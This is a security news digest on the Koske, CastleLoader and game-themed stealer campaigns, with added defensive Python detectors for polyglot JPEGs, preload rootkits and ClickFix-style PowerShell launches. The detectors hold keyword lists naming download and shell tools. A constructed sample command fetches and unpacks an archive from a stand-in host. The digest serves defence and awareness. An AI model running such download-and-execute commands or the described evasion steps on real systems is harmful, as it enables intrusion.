Koske Malware Hides in Panda Images to Deliver In-Memory Rootkits and Cryptominers on Linux
AquaSec researchers have uncovered a sophisticated Linux malware named Koske that embeds executable code within seemingly benign panda-themed JPEG images. The threat actors behind Koske exploit misconfigured, publicly exposed JupyterLab instances to gain remote code execution and deliver two malicious payloads. These payloads are hidden inside polyglot files—crafted to function both as valid images and as shell script or C code—without the use of traditional steganography. When processed by image viewers, the files appear as harmless panda images, but when interpreted by a shell, the hidden code executes in memory. One payload is a compiled-in-memory shared object functioning as a rootkit, utilizing LD_PRELOAD to hook and override system functions such as readdir(), thereby concealing files, processes, and directories related to the malware. The other payload is a shell script that maintains persistence through cron jobs and systemd services, while also modifying system DNS settings, flushing firewall rules, and deploying proxy evasion routines using built-in Linux utilities. After establishing control, the malware evaluates the infected machine’s hardware to determine which cryptominer to deploy for optimal performance across CPU and GPU configurations. The chosen miner is downloaded from GitHub and configured to support at least 18 different cryptocurrencies, including Monero, Ravencoin, Zano, Nexa, and Tari. Koske incorporates failover logic to automatically switch between coins or mining pools, ensuring uninterrupted operation. Its network configuration is hardened to evade detection, locking DNS to Cloudflare and Google resolvers, using the chattr +i flag to prevent modification, and attempting brute-force proxy validation via curl, wget, and raw TCP checks. The rootkit component reads hidden process IDs from /dev/shm/[.]hiddenpid, further complicating detection through user-space monitoring tools.
AquaSec analysts believe the malware’s adaptability and automation suggest development through large language models or advanced scripting platforms, raising concerns about the future of AI-assisted, evasive Linux threats.
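Two of the Koske traits above are cheap to check for from the defender's side: a JPEG that carries script or C source after its End-Of-Image marker, and a preload library planted in a volatile or hidden location. The following is an added example written for this digest, not AquaSec's tooling or anything from the Koske samples. It assumes that system-wide LD_PRELOAD persistence is expressed through /etc/ld.so.preload (the mechanism the dynamic loader honors), that the marker strings and "unusual" directories listed are reasonable starting points to tune, and the sample bytes and paths are constructed stand-ins rather than real indicators:

```python
"""Defender-side checks for two Koske traits: JPEG/script polyglots and
LD_PRELOAD-based hiding. Added example, not AquaSec's or the malware's code;
the sample bytes and paths below are constructed."""
import sys

JPEG_SOI = b"\xff\xd8"        # Start Of Image
JPEG_EOI = b"\xff\xd9"        # End Of Image
# Sequences that have no business appearing after a JPEG's EOI marker (assumed list).
SCRIPT_MARKERS = (b"#!/bin/bash", b"#!/bin/sh", b"#!/usr/bin/env",
                  b"bash -c", b"curl ", b"wget ", b"#include <", b"int main(")
# Assumed "unusual" homes for a preload library; tune to your baseline.
VOLATILE_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")


def trailing_payload(data: bytes) -> bytes:
    """Return the bytes after the last EOI marker of a JPEG (empty if not a JPEG).
    rfind() is used because EXIF thumbnails embed their own EOI."""
    if not data.startswith(JPEG_SOI):
        return b""
    end = data.rfind(JPEG_EOI)
    return data[end + 2:] if end != -1 else b""


def is_polyglot_jpeg(data: bytes) -> bool:
    """True when script or C source markers follow the image data. Benign files
    may carry a few bytes of padding, so trailing data alone is not enough."""
    tail = trailing_payload(data)
    return any(marker in tail for marker in SCRIPT_MARKERS)


def suspicious_preload_entries(preload_text: str) -> list:
    """Parse /etc/ld.so.preload content (one library path per line) and flag
    entries loaded from volatile directories or with hidden (dot) basenames."""
    hits = []
    for line in preload_text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        basename = path.rsplit("/", 1)[-1]
        if path.startswith(VOLATILE_DIRS) or basename.startswith("."):
            hits.append(path)
    return hits


# Constructed samples: a minimal JPEG skeleton with a script appended, a clean
# copy with padding, a PNG header, and a preload file. None are real artifacts.
_JPEG_BODY = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + JPEG_EOI
SAMPLE_POLYGLOT = _JPEG_BODY + b"\n#!/bin/bash\necho constructed payload\n"
SAMPLE_CLEAN = _JPEG_BODY + b"\x00\x00"          # harmless trailing padding
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PRELOAD = "/usr/lib/libexample.so\n/dev/shm/.example.so\n# comment\n"

if __name__ == "__main__":
    # Usage: python koske_checks.py <image.jpg> [<path to ld.so.preload>]
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], "polyglot" if is_polyglot_jpeg(fh.read()) else "clean")
    if len(sys.argv) > 2:
        with open(sys.argv[2]) as fh:
            print(sys.argv[2], suspicious_preload_entries(fh.read()))
    if len(sys.argv) == 1:
        print("constructed polyglot:", is_polyglot_jpeg(SAMPLE_POLYGLOT))
        print("constructed preload hits:", suspicious_preload_entries(SAMPLE_PRELOAD))
```

The polyglot check deliberately keys on recognisable source markers rather than on the mere presence of trailing bytes, since cameras and editors routinely leave padding after the EOI; the preload check is a parser only, so it can be run against a copied file from a host under investigation without executing anything on it.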
CastleLoader Malware Uses Clickfix Phishing and Clipboard Hijacking to Deploy Stealers and RATs
CastleLoader is a malware loader campaign active since early 2025, used to distribute a range of information stealers and remote access trojans (RATs). It relies on phishing and drive-by compromise techniques, where victims are lured to Cloudflare-themed “Clickfix” phishing sites that prompt them to paste PowerShell commands into the Run dialog. This social engineering trick executes obfuscated scripts that download ZIP archives containing AutoIT loaders, which inject shellcode and initiate C2 connections over HTTP. The shellcode fetches secondary payloads via ingress tool transfer, delivering malware families such as RedLine, StealC, NetSupport RAT, DeerStealer, SectopRAT, or HijackLoader. Fake GitHub repos mimicking SQL Server Management Studio serve as an alternate vector, with executables directly contacting the C2. Over a two-month period, operators utilized seven rotating servers, resulting in nearly 470 successful infections out of 1,634 attempts—a 28.7% success rate, including high-profile U.S. government targets. The malware’s backend infrastructure includes a versioned web-based control panel that resembles a malware-as-a-service offering. Its “installs” module collects system telemetry, while “tasks” and “delivery” sections manage payload distribution, privilege escalation attempts, and region-based targeting. CastleLoader uses obfuscation, DLL hashing, anti-VM logic, and runtime shellcode injection to evade detection. Some payloads are hosted in encrypted Docker containers, complicating static analysis. Shared infrastructure and loader samples link CastleLoader to DeerStealer operations, indicating collaborative or umbrella threat activity. Its evolving techniques and success rate highlight the need for stronger clipboard execution controls, behavioral analytics, and targeted user training to prevent misuse of built-in scripting environments.
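The Clickfix chain described above (a PowerShell one-liner pasted into the Run dialog that downloads and unpacks an archive) leaves a process-creation trail that the behavioral analytics the item calls for can score. The following is an added example written for this digest, not code from the CastleLoader report or its authors. It assumes process-creation events are available as records with parent, image and cmdline fields (map these from your EDR or Sysmon schema), the trait weights and threshold are assumptions to tune against your own telemetry, and the sample events are constructed:

```python
"""Scores Windows process-creation events for ClickFix-style execution: a
script host launched interactively with a pasted one-liner that downloads
and unpacks a payload. Added example, not CastleLoader code; field names and
sample events are constructed, weights are assumptions."""
import re

# Script hosts commonly typed into the Run dialog; extend from your own baseline.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (regex, weight, label). Weights are an assumption, not vendor guidance.
TRAITS = [
    (r"(?i)\s-(w|windowstyle)\s+hidden", 2, "hidden window"),
    (r"(?i)\s-(e|ec|enc|encodedcommand)\b", 2, "encoded command"),
    (r"(?i)\s-(nop|noprofile)\b", 1, "profile suppressed"),
    (r"(?i)\s-(ep|executionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|webclient|curl|wget)\b",
     2, "remote download"),
    (r"(?i)(expand-archive|\.zip\b)", 1, "archive handling"),
    (r"(?i)\b(iex|invoke-expression)\b", 2, "in-memory execution"),
]


def score_event(event: dict):
    """Return (score, labels) for one event with keys parent, image, cmdline."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in LAUNCHERS:
        return 0, []
    score, labels = 0, []
    for pattern, weight, label in TRAITS:
        if re.search(pattern, event["cmdline"]):
            score += weight
            labels.append(label)
    # The Run dialog (Win+R) spawns its child from explorer.exe, so a script
    # host launched straight from Explorer adds weight; scheduled or service
    # launched scripts arrive with a different parent.
    if event.get("parent", "").lower().endswith("explorer.exe"):
        score += 2
        labels.append("spawned by explorer.exe")
    return score, labels


def is_clickfix_like(event: dict, threshold: int = 5) -> bool:
    """Threshold of 5 is an assumption: one strong trait plus the Run-dialog parent
    is not enough on its own, two strong traits plus the parent is."""
    return score_event(event)[0] >= threshold


SAMPLE_EVENTS = [
    {   # constructed: a pasted one-liner of the shape described above
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": ('powershell -w hidden -nop -c "iwr http://example.invalid/a.zip '
                    '-OutFile $env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip $env:TEMP\\a"'),
    },
    {   # constructed: scheduled admin script, benign
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # constructed: ordinary program started from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        score, labels = score_event(event)
        verdict = "ALERT" if is_clickfix_like(event) else "ok"
        print(f"{verdict:5} score={score} {event['cmdline'][:60]}... {labels}")
```

Scoring rather than matching a single string keeps the rule robust to the obfuscation the item mentions: an attacker can rename the archive or swap iwr for another download cmdlet, but the hidden window, the interactive parent and the download-then-unpack shape tend to survive together.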
Malware Campaign Uses Discord and YouTube to Distribute Game-Themed Credential Stealers
The Acronis Threat Research Unit has exposed a sophisticated credential-harvesting campaign that uses fake indie games promoted through fraudulent websites, Discord channels, and YouTube videos to distribute infostealers. Malware families like Leet Stealer, RMC Stealer, and Sniffer Stealer are hidden within bogus game installers for titles such as Baruda Quest and Warstorm Fire. Attackers exploit stolen branding from real games to enhance legitimacy, luring victims into executing malicious Windows installers hosted on platforms like Discord CDN or Dropbox. These payloads harvest sensitive browser data, Discord tokens, and credentials from applications like Steam, Telegram, WhatsApp, and Epic Games. Variants frequently arrive in password-protected RAR files or display fake installation errors to obscure their intent. Acronis observed that most Windows-based samples are packaged using Electron and Nullsoft installers, embedding malicious JavaScript in app[.]asar files that execute post-install. Technically, the malware executes credential theft through browser debug interfaces and exfiltrates data via external services, such as gofile[.]io. RMC Stealer samples include sandbox evasion tactics that inspect system attributes—such as RAM size, usernames, GPU types, and specific processes—to determine if they’re running in a virtual environment. If detected, the malware halts and displays misleading VBScript errors. Otherwise, it performs comprehensive data theft, zipping credentials and session data for remote upload. Multilingual code comments (in Portuguese, Turkish, and English) and telemetry from Brazil and the U.S. indicate international collaboration and a focus on gaming communities in these regions. Some samples even contained unobfuscated source code, revealing both operational missteps and the modular, evolving nature of the campaign.
This activity underscores a growing trend in malware: combining technical stealth with highly targeted social engineering across popular platforms to maximize reach and persistence.
Top Vulnerabilities of the Week
Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.